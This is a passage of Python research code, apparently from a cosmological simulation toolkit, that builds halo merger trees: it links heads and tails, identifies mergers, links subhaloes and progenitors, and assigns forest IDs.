#only set the Root Tail if it has not been set. Here if halo has not had
#tail set, then must be the the first progenitor
#otherwise it should have already been set and just need to store the root tail
if (halodata[halosnap]['Tail'][ihalo]==0):
halodata[halosnap]['Tail'][ihalo]=haloid
halodata[halosnap]['TailSnap'][ihalo]=halosnap
halodata[halosnap]['RootTail'][ihalo]=haloid
halodata[halosnap]['RootTailSnap'][ihalo]=halosnap
roottail,rootsnap,rootindex=haloid,halosnap,ihalo
else:
roottail=halodata[halosnap]['RootTail'][ihalo]
rootsnap=halodata[halosnap]['RootTailSnap'][ihalo]
rootindex=int(roottail%TEMPORALHALOIDVAL)-1
#now move along tree first pass to store head and tails and root tails of main branch
while (True):
#ids contain index information
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
halodata[halosnap]['Num_descen'][haloindex]=tree[halosnap]['Num_descen'][haloindex]
#if no more descendants, break from search
if (halodata[halosnap]['Num_descen'][haloindex]==0):
#store for current halo its tail and root tail info (also store root tail for root head)
halodata[halosnap]['Head'][haloindex]=haloid
halodata[halosnap]['HeadSnap'][haloindex]=halosnap
halodata[halosnap]['RootHead'][haloindex]=haloid
halodata[halosnap]['RootHeadSnap'][haloindex]=halosnap
rootheadid,rootheadsnap,rootheadindex=haloid,halosnap,haloindex
#only set the roots head of the root tail
#if it has not been set before (ie: along the main branch of root halo)
if (halodata[rootsnap]['RootHead'][rootindex]==0):
halosnap,haloindex,haloid=rootsnap,rootindex,roottail
#set the root head of the main branch
while(True):
halodata[halosnap]['RootHead'][haloindex]=rootheadid
halodata[halosnap]['RootHeadSnap'][haloindex]=rootheadsnap
descen=halodata[halosnap]['Head'][haloindex]
descenindex=int(descen%TEMPORALHALOIDVAL)-1
descensnap=int(((descen-descen%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
if (ireverseorder):
descensnap=numsnaps-1-descensnap
if (haloid==descen):
break
halosnap,haloindex,haloid=descensnap,descenindex,descen
break
#now store the rank of the of the descandant.
descenrank=tree[halosnap]['Rank'][haloindex][0]
halodata[halosnap]['HeadRank'][haloindex]=descenrank
#as we are only moving along main branches stop if object is rank is not 0
if (descenrank>0):
break
#otherwise, get the descendant
#store main progenitor
maindescen=tree[halosnap]['Descen'][haloindex][0]
maindescenindex=int(maindescen%TEMPORALHALOIDVAL)-1
maindescensnap=int(((maindescen-maindescen%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
#if reverse order, then higher snap values correspond to lower index
if (ireverseorder):
maindescensnap=numsnaps-1-maindescensnap
#calculate stepsize in time based on the halo ids
stepsize=maindescensnap-halosnap
#store descendant
halodata[halosnap]['Head'][haloindex]=maindescen
halodata[halosnap]['HeadSnap'][haloindex]=maindescensnap
#and update the root tails of the object
halodata[maindescensnap]['Tail'][maindescenindex]=haloid
halodata[maindescensnap]['TailSnap'][maindescenindex]=halosnap
halodata[maindescensnap]['RootTail'][maindescenindex]=roottail
halodata[maindescensnap]['RootTailSnap'][maindescenindex]=rootsnap
halodata[maindescensnap]['Num_progen'][maindescenindex]+=1
#then move to the next descendant
haloid=maindescen
halosnap=maindescensnap
def TraceMainDescendantParallelChunk(istart,ihalochunk,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder):
for ihalo in ihalochunk:
TraceMainDescendant(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder)
def BuildTemporalHeadTailDescendant(numsnaps,tree,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, ireverseorder=False, iverbose=1):
"""
Adds for each halo its Head and Tail and stores Roothead and RootTail to the halo
properties file
TEMPORALHALOIDVAL is used to parse the halo ids and determine the step size between descendant and progenitor
"""
print("Building Temporal catalog with head and tails using a descendant tree")
for k in range(numsnaps):
halodata[k]['Head']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['Tail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['HeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['TailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootHead']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootTail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootHeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootTailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['HeadRank']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['Num_descen']=np.zeros(numhalos[k],dtype=np.uint32)
halodata[k]['Num_progen']=np.zeros(numhalos[k],dtype=np.uint32)
#for each snapshot identify halos that have not had their tail set
#for these halos, the main branch must be walked
#allocate python manager to wrapper the tree and halo catalog so they can be altered in parallel
manager=mp.Manager()
chunksize=5000000 #have each thread handle this many halos at once
#init to that at this point snapshots should be run in parallel
if (numhalos[0]>2*chunksize): iparallel=1
else: iparallel=-1 #no parallel at all
iparallel=-1
totstart=time.clock()
if (ireverseorder):
snaplist=range(numsnaps-1,-1,-1)
else:
snaplist=range(numsnaps)
if (iparallel==1):
#need to copy halodata as this will be altered
if (iverbose>0): print("copying halo")
start=time.clock()
mphalodata=manager.list([manager.dict(halodata[k]) for k in range(numsnaps)])
if (iverbose>0): print("done",time.clock()-start)
for istart in snaplist:
if (iverbose>0): print("Starting from halos at ",istart,"with",numhalos[istart])
if (numhalos[istart]==0): continue
#if the number of halos is large then run in parallel
if (numhalos[istart]>2*chunksize and iparallel==1):
#determine maximum number of threads
nthreads=int(min(mp.cpu_count(),ceil(numhalos[istart]/float(chunksize))))
nchunks=int(np.ceil(numhalos[istart]/float(chunksize)/float(nthreads)))
if (iverbose>0): print("Using", nthreads,"threads to parse ",numhalos[istart]," halos in ",nchunks,"chunks, each of size", chunksize)
#now for each chunk run a set of proceses
for j in range(nchunks):
start=time.clock()
offset=j*nthreads*chunksize
#if last chunk then must adjust nthreads
if (j==nchunks-1):
nthreads=int(ceil((numhalos[istart]-offset)/float(chunksize)))
halochunk=[range(offset+k*chunksize,offset+(k+1)*chunksize) for k in range(nthreads)]
#adjust last chunk
if (j==nchunks-1):
halochunk[-1]=range(offset+(nthreads-1)*chunksize,numhalos[istart])
#when calling a process pass not just a work queue but the pointers to where data should be stored
processes=[mp.Process(target=TraceMainDescendantParallelChunk,args=(istart,halochunk[k],numsnaps,numhalos,mphalodata,tree,TEMPORALHALOIDVAL,ireverseorder)) for k in range(nthreads)]
count=0
for p in processes:
print(count+offset,k,min(halochunk[count]),max(halochunk[count]))
p.start()
count+=1
for p in processes:
#join thread and see if still active
p.join()
if (iverbose>1): print((offset+j*nthreads*chunksize)/float(numhalos[istart])," done in",time.clock()-start)
#otherwise just single
else :
#if first time entering non parallel section copy data back from parallel manager based structure to original data structure
#as parallel structures have been updated
if (iparallel==1):
#tree=[dict(mptree[k]) for k in range(numsnaps)]
halodata=[dict(mphalodata[k]) for k in range(numsnaps)]
#set the iparallel flag to 0 so that all subsequent snapshots (which should have fewer objects) not run in parallel
#this is principly to minimize the amount of copying between manager based parallel structures and the halo/tree catalogs
iparallel=0
start=time.clock()
chunksize=max(int(0.10*numhalos[istart]),10)
for j in range(numhalos[istart]):
#start at this snapshot
#start=time.clock()
TraceMainDescendant(istart,j,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder)
if (j%chunksize==0 and j>0):
if (iverbose>1): print("done", j/float(numhalos[istart]), "in", time.clock()-start)
start=time.clock()
if (iverbose>0): print("done with first bit, setting the main branches walking forward in time")
#now have walked all the main branches and set the root tail, head and tail values
#in case halo data is with late times at beginning need to process items in reverse
if (ireverseorder):
snaplist=range(numsnaps)
else:
snaplist=range(numsnaps-1,-1,-1)
for istart in snaplist:
#identify all haloes which are not primary progenitors of their descendants, having a descendant rank >0
wdata=np.where(halodata[istart]['HeadRank']>0)
#sort this list based on descendant ranking
sortedranking=np.argsort(halodata[istart]['HeadRank'][wdata])
nrankedhalos=len(wdata[0])
rankedhalos=halodata[istart]['ID'][wdata[0][sortedranking]]
#for each of these haloes, set the head and use the root head information and root snap and set all the information
#long its branch
for ihalo in rankedhalos:
haloid=ihalo
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
halosnap=istart
#now set the head of these objects
maindescen=tree[halosnap]['Descen'][haloindex][0]
maindescenindex=int(maindescen%TEMPORALHALOIDVAL)-1
if (ireverseorder):
maindescensnap=numsnaps-1-int((maindescen-maindescen%TEMPORALHALOIDVAL)/TEMPORALHALOIDVAL)
else:
maindescensnap=int((maindescen-maindescen%TEMPORALHALOIDVAL)/TEMPORALHALOIDVAL)
#increase the number of progenitors of this descendant
halodata[halosnap]['Head'][haloindex]=maindescen
halodata[halosnap]['HeadSnap'][haloindex]=maindescensnap
halodata[maindescensnap]['Num_progen'][maindescenindex]+=1
#store the root head
roothead=halodata[maindescensnap]['RootHead'][maindescenindex]
rootsnap=halodata[maindescensnap]['RootHeadSnap'][maindescenindex]
#now set the root head for all the progenitors of this object
while (True):
halodata[halosnap]['RootHead'][haloindex]=roothead
halodata[halosnap]['RootHeadSnap'][haloindex]=rootsnap
if (haloid==halodata[halosnap]['Tail'][haloindex]):
break
haloid=halodata[halosnap]['Tail'][haloindex]
halosnap=halodata[halosnap]['TailSnap'][haloindex]
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
print("Done building", time.clock()-totstart)
def GetProgenLength(halodata,haloindex,halosnap,haloid,atime,TEMPORALHALOIDVAL,endreftime=-1):
"""
Get the length of a halo's progenitors
"""
proglen=1
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
while (progid!=haloid):
if (atime[progsnap]<=endreftime):break
proglen+=1
haloid=progid
halosnap=progsnap
haloindex=progindex
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
return proglen
def IdentifyMergers(numsnaps,tree,numhalos,halodata,boxsize,hval,atime,MERGERMLIM=0.1,RADINFAC=1.2,RADOUTFAC=1.5,NPARTCUT=100, TEMPORALHALOIDVAL=1000000000000, iverbose=1,pos_tree=[]):
"""
Using head/tail info in halodata dictionary identify mergers based on distance and mass ratios
#todo still testing
"""
for j in range(numsnaps):
#store id and snap and mass of last major merger and while we're at it, store number of major mergers
halodata[j]["LastMerger"]=np.ones(numhalos[j],dtype=np.int64)*-1
halodata[j]["LastMergerRatio"]=np.ones(numhalos[j],dtype=np.float64)*-1
halodata[j]["LastMergerSnap"]=np.zeros(numhalos[j],dtype=np.uint32)
halodata[j]["LastMergerDeltaSnap"]=np.zeros(numhalos[j],dtype=np.uint32)
#halodata[j]["NumMergers"]=np.zeros(numhalos[j],dtype=np.uint32)
#built KD tree to quickly search for near neighbours
if (len(pos_tree)==0):
pos=[[]for j in range(numsnaps)]
pos_tree=[[]for j in range(numsnaps)]
start=time.clock()
if (iverbose): print("tree build")
for j in range(numsnaps):
if (numhalos[j]>0):
boxval=boxsize*atime[j]/hval
pos[j]=np.transpose(np.asarray([halodata[j]["Xc"],halodata[j]["Yc"],halodata[j]["Zc"]]))
pos_tree[j]=spatial.cKDTree(pos[j],boxsize=boxval)
if (iverbose): print("done ",time.clock()-start)
#else assume tree has been passed
for j in range(numsnaps):
if (numhalos[j]==0): continue
#at snapshot look at all haloes that have not had a major merger set
#note that only care about objects with certain number of particles
partcutwdata=np.where(halodata[j]["npart"]>=NPARTCUT)
mergercut=np.where(halodata[j]["LastMergerRatio"][partcutwdata]<0)
hids=np.asarray(halodata[j]["ID"][partcutwdata][mergercut],dtype=np.uint64)
start=time.clock()
if (iverbose):print("Processing ", len(hids))
if (len(hids)==0):continue
for hidval in hids:
#now for each object get the main progenitor
haloid=np.uint64(hidval)
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
halosnap=j
originalhaloid=haloid
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
numprog=tree[halosnap]["Num_progen"][haloindex]
#if object has no progenitor set LastMergerRatio to 0 and LastMerger to 0
if (numprog==0):
halodata[halosnap]["LastMerger"][haloindex]=0
halodata[halosnap]["LastMergerRatio"][haloindex]=0
continue
#print "starting halos ",j, hidval
#halo has main branch which we can wander on
#while object is not its own progenitor move along tree to see how many major mergers it had across its history
while (True):
#now for each progenitor, lets find any nearby objects within a given mass/vmax interval
posval=[halodata[progsnap]["Xc"][progindex],halodata[progsnap]["Yc"][progindex],halodata[progsnap]["Zc"][progindex]]
radval=RADINFAC*halodata[progsnap]["R_200crit"][progindex]
#get neighbour list within RADINFAC sorted by mass with most massive first
NNlist=pos_tree[progsnap].query_ball_point(posval, radval)
NNlist=[NNlist[ij] for ij in np.argsort(halodata[progsnap]["Mass_tot"][NNlist])[::-1]]
#store boxval for periodic correction
boxval=boxsize*atime[progsnap]/hval
#now if list contains some objects, lets see if the velocity vectors are moving towards each other and mass/vmax ratios are okay
if (len(NNlist)>0):
for NN in NNlist:
if (NN!=progindex):
mratio=halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex]
vratio=halodata[progsnap]["Vmax"][NN]/halodata[progsnap]["Vmax"][progindex]
#merger ratio is for object being larger of the two involved in merger
if (mratio>MERGERMLIM and mratio<1.0):
posvalrel=[halodata[progsnap]["Xc"][progindex]-halodata[progsnap]["Xc"][NN],halodata[progsnap]["Yc"][progindex]-halodata[progsnap]["Yc"][NN],halodata[progsnap]["Zc"][progindex]-halodata[progsnap]["Zc"][NN]]
for ij in range(3):
if posvalrel[ij]<-0.5*boxval: posvalrel[ij]+=boxval
elif posvalrel[ij]>0.5*boxval: posvalrel[ij]-=boxval
velvalrel=[halodata[progsnap]["VXc"][progindex]-halodata[progsnap]["VXc"][NN],halodata[progsnap]["VYc"][progindex]-halodata[progsnap]["VYc"][NN],halodata[progsnap]["VZc"][progindex]-halodata[progsnap]["VZc"][NN]]
radvelval=np.dot(posvalrel,velvalrel)/np.linalg.norm(posvalrel)
if (radvelval<0):
#merger is happending
#print "merger happening ", progsnap, NN
#question of whether should move down the tree till merger no longer happening and define that as the start
#this could also set the length of the merger
#lets move along the tree of the infalling neighbour still it object is past the some factor of progenitor virial radius
starthaloindex=progindex
starthaloid=progid
starthalosnap=progsnap
startmergerindex=NN
startmergerid=halodata[progsnap]["ID"][NN]
startmergersnap=progsnap
mergerstartindex=starthaloindex
mergerstartid=starthaloid
mergerstartsnap=starthalosnap
while (tree[starthalosnap]["Num_progen"][starthaloindex]>0 and tree[startmergersnap]["Num_progen"][startmergerindex]>0):
posvalrel=[halodata[starthalosnap]["Xc"][starthaloindex]-halodata[startmergersnap]["Xc"][startmergerindex],halodata[starthalosnap]["Yc"][starthaloindex]-halodata[startmergersnap]["Yc"][startmergerindex],halodata[starthalosnap]["Zc"][starthaloindex]-halodata[startmergersnap]["Zc"][startmergerindex]]
boxval=boxsize*atime[starthalosnap]/hval
for ij in range(3):
if posvalrel[ij]<-0.5*boxval: posvalrel[ij]+=boxval
elif posvalrel[ij]>0.5*boxval: posvalrel[ij]-=boxval
radval=np.linalg.norm(posvalrel)/halodata[starthalosnap]["R_200crit"][starthaloindex]
mratio=halodata[startmergersnap]["Mass_tot"][startmergerindex]/halodata[starthalosnap]["Mass_tot"][starthaloindex]
#as moving back if halo now outside or too small, stop search and define this as start of merger
if (radval>RADOUTFAC or mratio<MERGERMLIM):
mergerstartindex=starthaloindex
mergerstartid=starthaloid
mergerstartsnap=starthalosnap
break
#move to next progenitors
nextidval=halodata[starthalosnap]["Tail"][starthaloindex]
nextsnapval=halodata[starthalosnap]["TailSnap"][starthaloindex]
nextindexval=int(nextidval%TEMPORALHALOIDVAL-1)
starthaloid=nextidval
starthalosnap=nextsnapval
starthaloindex=nextindexval
nextidval=halodata[startmergersnap]["Tail"][startmergerindex]
nextsnapval=halodata[startmergersnap]["TailSnap"][startmergerindex]
nextindexval=int(nextidval%TEMPORALHALOIDVAL-1)
startmergerid=nextidval
startmergersnap=nextsnapval
startmergerindex=nextindexval
#store timescale of merger
deltamergertime=(mergerstartsnap-progsnap)
#set this as the merger for all halos from this point onwards till reach head or halo with non-zero merger
merginghaloindex=mergerstartindex
merginghaloid=mergerstartid
merginghalosnap=mergerstartsnap
oldmerginghaloid=merginghaloid
#print "Merger found ",progsnap,mergerstartsnap, halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex],
#print halodata[startmergersnap]["Mass_tot"][startmergerindex]/halodata[starthalosnap]["Mass_tot"][starthaloindex]
#now set merger time for all later haloes unless an new merger has happened
while (oldmerginghaloid!=halodata[progsnap]["RootHead"][progindex] and halodata[merginghalosnap]["LastMergerRatio"][merginghaloindex]<0):
halodata[merginghalosnap]["LastMerger"][merginghaloindex]=halodata[progsnap]["ID"][NN]
halodata[merginghalosnap]["LastMergerRatio"][merginghaloindex]=halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex]
halodata[merginghalosnap]["LastMergerSnap"][merginghaloindex]=progsnap
halodata[merginghalosnap]["LastMergerDeltaSnap"][merginghaloindex]=deltamergertime
oldmerginghaloid=merginghaloid
mergingnextid=halodata[merginghalosnap]["Head"][merginghaloindex]
mergingnextsnap=halodata[merginghalosnap]["HeadSnap"][merginghaloindex]
mergingnextindex=int(mergingnextid%TEMPORALHALOIDVAL-1)
merginghaloindex=mergingnextindex
merginghaloid=mergingnextid
merginghalosnap=mergingnextsnap
#move to next step
if (haloid==progid):
oldhaloid=haloid
currentsnap=halosnap
currentindex=haloindex
currentid=haloid
while (oldhaloid!=halodata[progsnap]["RootHead"][progindex] and halodata[currentsnap]["LastMergerRatio"][currentindex]<0):
halodata[currentsnap]["LastMerger"][currentindex]=0
halodata[currentsnap]["LastMergerRatio"][currentindex]=0
nextid=halodata[currentsnap]["Head"][currentindex]
nextsnap=halodata[currentsnap]["HeadSnap"][currentindex]
nextindex=int(nextid%TEMPORALHALOIDVAL-1)
oldhaloid=currentid
currentsnap=nextsnap
currentid=nextid
currentindex=nextindex
break
haloid=progid
haloindex=progindex
halosnap=progsnap
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
numprog=tree[halosnap]["Num_progen"][haloindex]
#if at end of line then move up and set last major merger to 0
if (iverbose): print("Done snap",j,time.clock()-start)
def generate_sublinks(numhalos,halodata):
"""
generate sublinks for specific time slice
"""
if (numhalos==0):
return
halos=np.where(halodata['hostHaloID']==-1)[0]
for ihalo in halos:
haloid=halodata['ID'][ihalo]
halodata['PreviousSubhalo'][ihalo]=haloid
w=np.where((halodata["hostHaloID"]==haloid))[0]
if (len(w)>0):
halodata['NextSubhalo'][ihalo]=halodata['ID'][w[0]]
halodata['PreviousSubhalo'][w[0]]=halodata['ID'][w[0]]
for isub in range(len(w)-1):
subid=halodata['ID'][w[isub]]
nextsubid=halodata['ID'][w[isub+1]]
halodata['NextSubhalo'][w[isub]]=nextsubid
halodata['PreviousSubhalo'][w[isub+1]]=subid
halodata['NextSubhalo'][w[-1]]=halodata['ID'][w[-1]]
else:
halodata['NextSubhalo'][ihalo]=haloid
def GenerateSubhaloLinks(numsnaps,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, iverbose=0, iparallel=0):
"""
This code generates a quick way of moving across a halo's subhalo list
The code is passed
- the number of snapshots,
- an array of the number of haloes per snapshot,
- the halodata dictionary structure which must contain the halo merger tree based keys, Head, RootHead, etc, and mass, phase-space positions of haloes,
and other desired properties
"""
for j in range(numsnaps):
#store id and snap and mass of last major merger and while we're at it, store number of major mergers
halodata[j]["NextSubhalo"]=np.zeros(numhalos[j],dtype=np.int64)
halodata[j]["PreviousSubhalo"]=np.zeros(numhalos[j],dtype=np.int64)
#iterate over all host halos and set their subhalo links
start=time.clock()
nthreads=1
if (iparallel):
manager=mp.Manager()
nthreads=int(min(mp.cpu_count(),numsnaps))
print("Number of threads is ",nthreads)
for j in range(0,numsnaps,nthreads):
start2=time.clock()
if (iparallel):
activenthreads=nthreads
if (numsnaps-1-j<activenthreads): activenthreads=numsnaps-1-j
processes=[mp.Process(target=generate_sublinks,args=(numhalos[j+k],halodata[j+k])) for k in range(activenthreads)]
for p in processes:
p.start()
for p in processes:
p.join()
if (iverbose): print("Done snaps",j,"to",j+nthreads,time.clock()-start2)
else:
generate_sublinks(numhalos[j],halodata[j])
if (iverbose): print("Done snap",j,time.clock()-start2)
print("Done subhalolinks ",time.clock()-start)
def GenerateProgenitorLinks(numsnaps,numhalos,halodata,nsnapsearch=4,TEMPORALHALOIDVAL=1000000000000, iverbose=1):
"""
This code generates a quick way of moving across a halo's progenitor list storing a the next/previous progenitor
The code is passed
- the number of snapshots,
- an array of the number of haloes per snapshot,
- the halodata dictionary structure which must contain the halo merger tree based keys, Head, RootHead, etc, and mass, phase-space positions of haloes,
and other desired properties
"""
if (nsnapsearch>=numsnaps-1):
nsnapsearch=numsnaps-1
print("Warning, number of snaps < search size, reducing search size to numsnaps-1=",nsnapsearch)
for j in range(numsnaps):
#store id and snap and mass of last major merger and while we're at it, store number of major mergers
halodata[j]["NextProgenitor"]=np.ones(numhalos[j],dtype=np.int64)*-1
halodata[j]["PreviousProgenitor"]=np.ones(numhalos[j],dtype=np.int64)*-1
#move backward in time and identify all unique heads
start=time.clock()
for j in range(1,numsnaps):
start2=time.clock()
if (numhalos[j]==0): continue
#find all unique heads
heads=np.unique(np.array(np.int64(halodata[j]['Head'])))
#for these heads identify all halos with this head
for ihead in heads:
currenttails=deque()
for k in range(j,j+nsnapsearch):
w=np.where(halodata[k]['Head']==ihead)
if (len(w[0])>0):
currenttails.extend(np.nditer(np.int64(halodata[k]["ID"][w])))
if (len(currenttails)==0):
continue
haloid=currenttails[0]
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
halosnap=numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL
halodata[halosnap]['PreviousProgenitor'][haloindex]=np.int64(haloid)
for itail in range(len(currenttails)-1):
haloid=currenttails[itail]
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
halosnap=np.inte64(numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
haloindex=int(currenttails[itail]%TEMPORALHALOIDVAL-1)
nexthaloid=currenttails[itail+1]
nexthaloindex=int(nexthaloid%TEMPORALHALOIDVAL-1)
nexthalosnap=np.int64(numsnaps-1-(nexthaloid-int(nexthaloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
halodata[halosnap]['NextProgenitor'][haloindex]=np.int64(nexthaloid)
halodata[nexthalosnap]['PreviousProgenitor'][nexthaloindex]=np.int64(haloid)
haloid=currenttails[-1]
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
halosnap=numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL
halodata[halosnap]['NextProgenitor'][haloindex]=haloid
if (iverbose): print("Done snap",j,time.clock()-start2)
print("Done progenitor links ",time.clock()-start)
def SetForestID(numsnaps,halodata,rootheadid,ForestID,AllRootHead,
TEMPORALHALOIDVAL = 1000000000000,searchSnapLim = 5, ireversesnaporder=True):
"""
Sets the forest id of halos using a roothead as a start point.
Given an initial root head and end snapshot,
First append the roothead to the AllRootHead list.
search all previous snapshots for any haloes that share the same roothead.
Also at each snapshot, find all subhaloes of all haloes sharing the same
root head
if the roothead of a subhalo is not present in the AllRootHead list
then recursively call SetForestID with this subhalo's root head as start point
if a subhalo's current host is not within the tree defined by rootheadid
then recursively call SetForestID with this host's root head as start point
Parameters
----------
numsnaps : numpy.int32
the number of snapshots
halodata : dict
the halodata dictionary structure which must contain the halo merger tree based keys (Head, RootHead), etc.
rootheadid : numpy.int64
the rootheadid of the tree that will be explored and have its forestID set
AllRootHead : list
a list that stores the current set of rootheadid values that have been searched
Optional Parameters
-------------------
TEMPORALHALOIDVAL : numpy.int64
Temporal ID value that makes Halo IDs temporally unique, adding a snapshot num* this value.
Allows one to quickly parse a Halo ID to determine the snapshot it exists at and its index.
searchSnapLim : numpy.int32
Maximum number of snapshots to keep searching if no new halos are identified as beloning to
a rootheadid's tree, moving backwards in time
ireversesnaporder : bool
Whether dictionary data has late times starting at 0 (True, default) or at end of dictionary (False)
Returns
-------
AllRootHead : list
Updated list
halodata : dict
Updated halo data
"""
if (ireversesnaporder): endSnap = numsnaps-int(rootheadid/TEMPORALHALOIDVAL)-1
else : endSnap = int(rootheadid/TEMPORALHALOIDVAL)
rootheadindex=int(rootheadid%TEMPORALHALOIDVAL-1)
AllRootHead.append(rootheadid)
#set the forest level of this searcheed
#if this object is a host at final snap then set the forest level to 0
#otherwise set the ForestLevel to 1
ForestLevel=1*(halodata[endSnap]["hostHaloID"][rootheadindex]!=-1)
#Indicator for amount of snapshots searcheed
iSearchSnap = 0
#set the direction of how the data will be processed
if (ireversesnaporder): snaplist=np.arange(endSnap,numsnaps,dtype=np.int32)
else : snaplist=np.arange(endsnap,-1,-1)
for snap in snaplist:
#Find which halos at this snapshot point to the RootDescedant
sel = np.where(halodata[snap]["RootHead"]==rootheadid)[0]
#keep track of how many snapshots there have been where there is nothing in the tree
if(sel.size==0):
iSearchSnap+=1
if(iSearchSnap==searchSnapLim): break
else: iSearchSnap = 0
# Set all the halos within this tree within this snapshot to this forest ID
halodata[snap]["ForestID"][sel] = ForestID
halodata[snap]["ForestLevel"][sel] = ForestLevel
#Lets find which halos are subhalos of the halos within the tree defined by
#halos with the same rootheadid
subHaloIndxs = np.where(np.in1d(halodata[snap]["hostHaloID"],halodata[snap]["ID"][sel]))[0]
#Lets loop over all the subhalos within this selection, which contains
#all subhalos of any host halos within the tree defined by rootheadid
for subHaloIndx in subHaloIndxs:
#See if this tree has already been set
if(halodata[snap]["RootHead"][subHaloIndx] not in AllRootHead):
#Lets walk the subhalo's tree setting the forest ID
AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[snap]["RootHead"][subHaloIndx],ForestID,AllRootHead)
#Extract the hosts of all subhalos in this selection that are not already in the tree defined by rootheadid
treeSubhaloSel = (halodata[snap]["hostHaloID"][sel]!=-1) & (np.invert(np.in1d(halodata[snap]["hostHaloID"][sel],halodata[snap]["ID"][sel])))
#Get the index of these hosts that lie outside the tree
hostIndxs = np.unique(halodata[snap]["hostHaloID"][sel][treeSubhaloSel]%TEMPORALHALOIDVAL-1).astype(int)
#Loop over all the index for the host halos
for hostIndx in hostIndxs:
#See if this tree has already been set
if(halodata[snap]["RootHead"][hostIndx] not in AllRootHead):
#Lets walk the hosts tree setting the forrest ID
AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[snap]["RootHead"][hostIndx],ForestID,AllRootHead)
return AllRootHead,halodata
def GenerateForest(numsnaps,numhalos,halodata,atime,
TEMPORALHALOIDVAL=1000000000000, iverbose=1, interactiontime=2, ispatialintflag=False, pos_tree=[], cosmo=dict()):
"""
This code traces all root heads back in time identifying all interacting haloes and bundles them together into the same forest id
The idea is to have in the halodata dictionary an associated unique forest id for all related (sub)haloes. The code also allows
for some cleaning of the forest, specifically if a (sub)halo is only interacting for some small fraction of time, then it is not
assigned to the forest. This can limit the size of a forest, which could otherwise become the entire halo catalog.
Parameters
----------
numsnaps : numpy.int32
the number of snapshots
numhalos : array
array of the number of haloes per snapshot.
halodata : dict
the halodata dictionary structure which must contain the halo merger tree based keys (Head, RootHead), etc.
atime : array
an array of scale factors
Optional Parameters
-------------------
TEMPORALHALOIDVAL : numpy.int64
Temporal ID value that makes Halo IDs temporally unique, adding a snapshot num* this value.
Allows one to quickly parse a Halo ID to determine the snapshot it exists at and its index.
iverbose : int
verbosity of function (0, minimal, 1, verbose, 2 chatterbox)
interactiontime : int
Optional functionality not implemented yet. Allows forest to be split if connections do not span
more than this number of snapshots
ispatialintflag : bool
Flag indicating whether spatial information should be used to join forests. This requires cosmological information
pos_tree : scikit.spatial.cKDTree
Optional functionality not implemented yet. Allows forests to be joined if haloes
are spatially close.
cosmo : dict
dictionary which has cosmological information such as box size, hval, Omega_m
Returns
-------
ForestSize : numpy.array
Update the halodata dictionary with ForestID information and also returns the size of
the forests
"""
#initialize the dictionaries
for j in range(numsnaps):
#store id and snap and mass of last major merger and while we're at it, store number of major mergers
halodata[j]["ForestID"]=np.ones(numhalos[j],dtype=np.int64)*-1
halodata[j]["ForestLevel"]=np.ones(numhalos[j],dtype=np.int32)*-1
#built KD tree to quickly search for near neighbours. only build if not passed.
if (ispatialintflag):
start=time.clock()
boxsize=cosmo['BoxSize']
hval=cosmo['Hubble_param']
if (len(pos_tree)==0):
pos=[[]for j in range(numsnaps)]
pos_tree=[[]for j in range(numsnaps)]
start=time.clock()
if (iverbose): print("KD tree build")
for j in range(numsnaps):
if (numhalos[j]>0):
boxval=boxsize*atime[j]/hval
pos[j]=np.transpose(np.asarray([halodata[j]["Xc"],halodata[j]["Yc"],halodata[j]["Zc"]]))
pos_tree[j]=spatial.cKDTree(pos[j],boxsize=boxval)
if (iverbose): print("done ",time.clock()-start)
#now start marching backwards in time from root heads
#identifying all subhaloes that have every been subhaloes for long enough
#and all progenitors and group them together into the same forest id
forestidval=1
start=time.clock()
for j in range(numsnaps):
start2=time.clock()
if (numhalos[j]==0): continue
#now with tree start at last snapshot and identify all root heads
#only look at halos that are their own root head and are not subhalos
rootheads=np.where((halodata[j]['ID']==halodata[j]['RootHead'])*(halodata[j]['hostHaloID']==-1)*(halodata[j]['ForestID']==-1))
if (iverbose): print("At snapshot",j,len(rootheads[0]))
for iroothead in rootheads[0]:
